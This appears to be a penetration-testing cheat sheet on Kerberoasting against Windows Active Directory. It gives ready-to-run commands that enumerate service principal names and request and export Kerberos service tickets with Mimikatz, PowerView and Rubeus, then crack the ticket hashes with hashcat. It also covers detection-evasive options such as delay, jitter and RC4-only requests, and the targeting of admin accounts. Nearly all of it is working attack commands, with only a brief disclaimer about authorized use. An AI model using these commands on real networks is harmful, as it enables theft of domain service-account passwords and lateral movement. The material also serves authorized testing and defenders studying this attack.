Skip to content
Disclaimer: This material is provided for educational purposes and authorized security testing only. You are solely responsible for how you use the information. Do not use these techniques on systems without explicit permission from the owner. We do not encourage any kind of illegal or harmful activity

Step 1: Preparation and SPN Enumeration

  1. List all Service Principal Names (SPNs) in the domain:

    setspn.exe -Q */*

  2. Add the .NET Framework class to the PowerShell session:

    Add-Type -AssemblyName System.IdentityModel

  3. Request a Ticket Granting Service (TGS) ticket for a specific SPN:

    New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-SQL-hackfast.example.local:1433"

  4. Retrieve all tickets:

    setspn.exe -T EXAMPLE.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

Step 2: Export and Prepare Kerberos Tickets

  1. Use Mimikatz to list and export Kerberos tickets:

    mimikatz # kerberos::list /export

  2. Convert tickets to base64 for easier transport:

    mimikatz # base64 /out:true

  3. Remove new lines and spaces:

    echo "[BASE64 BLOB]" | tr -d \\n

  4. Save the blob to a .kirbi file:

    cat encoded_file | base64 -d > sqldev.kirbi

Step 3: Extract and Crack the Kerberos Ticket

  1. Extract the Kerberos ticket using kirbi2john.py:

    python2.7 kirbi2john.py sqldev.kirbi > crack_file

  2. Modify the file for Hashcat:

    sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat

  3. Confirm the prepared hash:

    cat sqldev_tgs_hashcat

  4. Crack the hash with Hashcat:

    hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt

PowerView for SPN Enumeration and Ticket Extraction

  1. Import PowerView:

    Import-Module .\PowerView.ps1

  2. List domain users with SPNs:

    Get-DomainUser * -spn | select samaccountname

  3. Get SPN tickets for a specific user and format for Hashcat:

    Get-DomainUser -Identity [USERNAME] | Get-DomainSPNTicket -Format Hashcat

Rubeus for Advanced Kerberoasting Techniques

  1. Perform Kerberoasting and output hashes to a file:

    .\Rubeus.exe kerberoast /outfile:hashes.txt

  2. Perform Kerberoasting with alternate credentials:

    .\Rubeus.exe kerberoast /creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD

  3. Perform Kerberoasting with an existing TGT:

    .\Rubeus.exe kerberoast /ticket:BASE64 | /ticket:FILE.KIRBI

  4. Perform OPSEC-safe Kerberoasting:

    .\Rubeus.exe kerberoast /rc4opsec

  5. Request tickets for accounts with an admin count of 1:

    .\Rubeus.exe kerberoast /ldapfilter:'admincount=1'

  6. Perform Kerberoasting with a delay and jitter:

    .\Rubeus.exe kerberoast /delay:5000 /jitter:30